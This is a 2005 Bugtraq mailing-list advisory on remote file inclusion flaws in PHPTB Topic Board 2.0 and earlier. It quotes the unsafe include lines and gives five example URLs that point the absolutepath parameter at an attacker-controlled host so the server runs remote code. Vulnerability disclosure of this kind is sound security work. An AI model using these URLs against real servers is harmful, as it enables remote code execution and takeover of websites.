[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities
From:       goszynskif () gmail ! com
Date:       2005-08-17 10:14:39
Message-ID: 20050817101439.3220.qmail () securityfocus ! com
[Download RAW message or body]

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: PHPTB Topic Board - Multiple PHP injection
                             vulnerabilities
   Version <= 2.0
   Homepage: htt://www.phptb.com/

   Author: Filip Groszyński (VXSfx)
   Date: 17 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

     PHPTB Topic Borad is an open source portal system. 
     However, an input validation flaw can cause malicious
     attackers to remote code execution on the web server.

   --------------------------------------------------------
   
   Vulnerable code exist in ./classes/admin_o.php,
                            ./classes/board_o.php,
                            ./classes/dev_o.php,
                            ./classes/file_o.php and
                            ./classes/tech_o.php:
  <?php
	include $absolutepath.'classes/smart_o.php';
   ... EOF

   Over that I found vulnerable code in ./classes/dev_o.php and
                                        ./classes/tech_o.php:

   ...
        require $GLOBALS['absolutepath'].'userpass.php';
   ... EOF
  
   --------------------------------------------------------

   Examples:

       http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif gmail com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic